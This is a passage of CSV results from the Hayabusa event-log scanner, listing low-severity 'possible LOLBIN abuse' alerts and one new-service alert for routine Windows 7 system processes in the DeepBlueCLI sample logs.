Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | 
Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 
00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 02:31:58.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 
0x748 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 
04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" 
/l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious 